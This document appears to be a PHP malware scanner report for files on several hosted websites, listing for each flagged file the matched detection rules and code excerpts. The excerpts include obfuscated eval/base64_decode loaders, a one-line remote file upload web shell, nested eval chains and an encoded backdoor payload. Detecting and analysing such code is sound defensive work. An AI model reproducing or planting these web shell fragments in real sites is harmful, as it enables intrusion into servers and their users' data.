/custdata02/turtle/public_html/scullycommercial.com/xoAlzmWyPIB.php

Size: 51.33 kB Created: 2024-06-04 19:51:05 Modified: 2024-06-04 19:51:05 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($UbskV($gbWJv($UMwGZ('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0CL`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/scullycommercial.com/YHErqBetbm8.php

Size: 38.68 kB Created: 2024-06-04 19:51:05 Modified: 2024-06-04 19:51:05 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/scullycommercial.com/theme-insribd.php

Size: 338.00 B Created: 2024-06-04 19:51:05 Modified: 2024-06-04 19:51:05 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/suspended.page/Kz9gFdEURfa.php

Size: 43.44 kB Created: 2024-06-01 02:25:11 Modified: 2024-06-01 08:12:22 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKHN2CjspKSk4LSAsbjBrMCwnAACnIv/IEUI...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($DiNjf($zrfJC($PcQnr($kNdXC('R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKH...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php NVCh`
Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db)	`<?php y2HY`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/suspended.page/pq3gUuxQPAB.php

Size: 51.36 kB Created: 2024-06-01 02:25:11 Modified: 2024-06-01 08:12:22 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($WBZyL($AlFWd($WQIKf('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0CL`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/suspended.page/index.php

Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 08:12:22 Dangers: 6

Description	Match
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request	`<?php ${"_GET"}`
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}`
Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 301ca578 Dangerous Malware Signature (hash: 301ca578)	`<?php trojan`
Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7)	`<?php w/cGhw`

/custdata02/turtle/public_html/suspended.page/search.php

Size: 9.96 kB Created: 2022-05-03 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 2

Description	Match
Exploit align Line: 6 Warning Code alignment technique is usually used for the obfuscation of malicious code	`<?php $l1fh2s=$GLOBALS["b6b6666"]($l1SiN);$l1FpxA=$l1k($l1fh2s["host"],isset($l1fh2s["port"])`
Exploit reversed Line: 6 Dangerous Reverse function technique is used for the obfuscation of dangerous PHP functions	`<?php ecalper_rts`
Function strrev exec_strrev Line: 6 Dangerous Encoded Function `exec` [https://www.php.net/exec]	`<?php cexe`

/custdata02/turtle/public_html/suspended.page/Z6AWFvIweoR.php

Size: 43.48 kB Created: 2024-06-04 19:34:30 Modified: 2024-06-04 19:34:30 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYWhzIShzdgo7KSkpOC0gLG4wazAsJwAApyL...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($SIunp($udwGf($IgvuO($xqlbS('QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYW...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/suspended.page/9hFw7kCvDiG.php

Size: 166.77 kB Created: 2024-06-04 19:34:30 Modified: 2024-06-04 19:34:30 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/suspended.page/ly7aFQKurL1.php

Size: 51.81 kB Created: 2024-06-04 19:34:30 Modified: 2024-06-04 19:34:30 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5Rg5VpBJefHMVmPCYH6B...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($MuUwa($tIRhZ('VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5...
Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php LAve`
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php N0YX`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/suspended.page/9jYRvBQTbK7.php

Size: 38.68 kB Created: 2024-06-04 19:34:30 Modified: 2024-06-04 19:34:30 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/suspended.page/theme-inszlbn.php

Size: 338.00 B Created: 2024-06-04 19:34:30 Modified: 2024-06-04 19:34:30 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/suspended.page/m7hiydpTbg9.php

Size: 43.51 kB Created: 2024-06-04 19:51:06 Modified: 2024-06-04 19:51:06 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3sTfsf/gP8/g3TuZHT/YfoP6f/GZv8/UJH...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($fpwQi($fCjKH($LElTj($HJrhk('eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/suspended.page/bX3JdAHPNTW.php

Size: 166.77 kB Created: 2024-06-04 19:51:06 Modified: 2024-06-04 19:51:06 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/suspended.page/dJCoA2SFH8E.php

Size: 51.33 kB Created: 2024-06-04 19:51:06 Modified: 2024-06-04 19:51:06 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($UbskV($gbWJv($UMwGZ('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0CL`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/suspended.page/QK2qeFI356M.php

Size: 38.68 kB Created: 2024-06-04 19:51:06 Modified: 2024-06-04 19:51:06 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/suspended.page/theme-insxdsb.php

Size: 338.00 B Created: 2024-06-04 19:51:06 Modified: 2024-06-04 19:51:06 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/turtlesys.com/speedtest/speedtest/wp/HngYW.php

Size: 30.13 kB Created: 2024-06-01 06:29:58 Modified: 2024-06-01 08:12:22 Warns: 3 Dangers: 21

Description	Match
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb01DazdDbVZ5Y205eVgzSmxjRzl5ZEdsdVp5Z3dLVHNLYzJWemMybHZibDl6ZEdGeWRDZ3BPd3BwWmlnaGFYTnpaWFFvSkY5VFJWTlRTVTlPV3lkcmF5ZGRLU2w3Q2lBZ0lDQWtYMU5GVTFOSlQwNWJKMnRySjEwZ1BTQWtYMUpGVVZWRlUxUmJKMnRySjEwN0NuMEthV1lvSkY5VFJWTlRTVTlPV3lkcmF5ZGRJQ0U5SUNjeU1ESXpKeWw3Q2dsbFkyaHZJQ2RyYXljN0NpQWdJQ0JsZUdsMEtDazdDbjBLSkhSNWNHVWdQU0FrWDFKRlVWVkZVMVJiSjNSNWN...
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "PD9waHAgaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOyBAc2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwppZighaXNzZXQoJF9TRVNTSU9OWydrayddKSl7CiAgICAkX1NFU1NJT05bJ2trJ10gPSAkX1JFUVVFU1RbJ2trJ107Cn0KaWYoJF9TRVNTSU9OWydrayddICE9ICcyMDIzJyl7CgllY2hvICdrayc7CiAgICBleGl0KCk7Cn0KJHR5cGUgPSAkX1JFUVVFU1RbJ3R5cGUnXTsKJHBhdGggPSAkX1JFUVVFU1RbJ3BhdGgnXTsKJGRhdGEgPSAkX1NFUlZFUjsKJHdlYnNpdGVfcGF0aCA9ICRkYXRhWydET0NVTUVOVF9ST09UJ107CiRmaWxlX3BhdGggPSAkZGF0YVsnU0N...
Exploit eval_base64 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine	<?php eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb01DazdDbVZ5Y205eVgzSmxjRzl5ZEdsdVp5Z3dLVHNLYzJWemMybHZibDl6ZEdGeWRDZ3BPd3BwWmlnaGFYTnpaWFFvSkY5VFJWTlRTVTlPV3lkcmF5ZGRLU2w3Q2lBZ0lDQWtYMU5GVTFOSlQwNWJKMnRySjEwZ1BTQWtYMUpGVVZWRlUxUmJKMnRySjEwN0NuMEthV1lvSkY5VFJWTlRTVTlPV3lkcmF5ZGRJQ0U5SUNjeU1ESXpKeWw3Q2dsbFkyaHZJQ2RyYXljN0NpQWdJQ0JsZUdsMEtDazdDbjBLSkhSNWNHVWdQU0FrWDFK...
Exploit eval_comment Line: 1 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine	<?php eval/-Q:W_IWXyhu7W{z8#)h;d9rA1jO@^p6oF%ToE?W\|!UZh{<.G{6,3lu-/(/-ryKHdO(\|-/base64_decode/-.A_~$RrcA-/(/-z9Tu8uS^x-/"ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb01DazdDbVZ5Y205eVgzSmxjRzl5ZEdsdVp5Z3dLVHNLYzJWemMybHZibDl6ZEdGeWRDZ3BPd3BwWmlnaGFYTnpaWFFvSkY5VFJWTlRTVTlPV3lkcmF5ZGRLU2w3Q2lBZ0lDQWtYMU5GVTFOSlQwNWJKMnRySjEwZ1BTQWtYMUpGVVZWRlUxUmJKMnRySjEwN0NuMEthV1lvSkY5VFJWTlRTV...
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	<?php eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb01DazdDbVZ5Y205eVgzSmxjRzl5ZEdsdVp5Z3dLVHNLYzJWemMybHZibDl6ZEdGeWRDZ3BPd3BwWmlnaGFYTnpaWFFvSkY5VFJWTlRTVTlPV3lkcmF5ZGRLU2w3Q2lBZ0lDQWtYMU5GVTFOSlQwNWJKMnRySjEwZ1BTQWtYMUpGVVZWRlUxUmJKMnRySjEwN0NuMEthV1lvSkY5VFJWTlRTVTlPV3lkcmF5ZGRJQ0U5SUNjeU1ESXpKeWw3Q2dsbFkyaHZJQ2RyYXljN0NpQWdJQ0JsZUdsMEtDazdDbjBLSkhSNWNHVWdQU0FrWDFK...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb01DazdDbVZ5Y205eVgzSmxjRzl5ZEdsdVp5Z3dLVHNLYzJWemMybHZibDl6ZEdGeWRDZ3BPd3BwWmlnaGFYTnpaWFFvSkY5VFJWTlRTVTlPV3lkcmF5ZGRLU2w3Q2lBZ0lDQWtYMU5GVTFOSlQwNWJKMnRySjEwZ1BTQWtYMUpGVVZWRlUxUmJKMnRySjEwN0NuMEthV1lvSkY5VFJWTlRTVTlPV3lkcmF5ZGRJQ0U5SUNjeU1ESXpKeWw3Q2dsbFkyaHZJQ2RyYXljN0NpQWdJQ0JsZUdsMEtDazdDbjBLSkhSNWNHVWdQU0FrWDFK...
Sign 0f37c730 Dangerous Malware Signature (hash: 0f37c730)	`<?php mdW5jdGlvb`
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	`<?php eval("?>".base64_decode`
Sign 162cf671 Dangerous Malware Signature (hash: 162cf671)	`<?php hcnJheV`
Sign 407651f7 Dangerous Malware Signature (hash: 407651f7)	`<?php w/cGhw`
Sign 7186bb8d Dangerous Malware Signature (hash: 7186bb8d)	`<?php RfUE9TV`
Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6)	`<?php N0cl`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php JF9QT1NU`
Sign 7f5d33bf Line: 1 Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign 91535293 Dangerous Malware Signature (hash: 91535293)	`<?php lY2hv`
Sign 963e968a Dangerous Malware Signature (hash: 963e968a)	`<?php PD9waH`
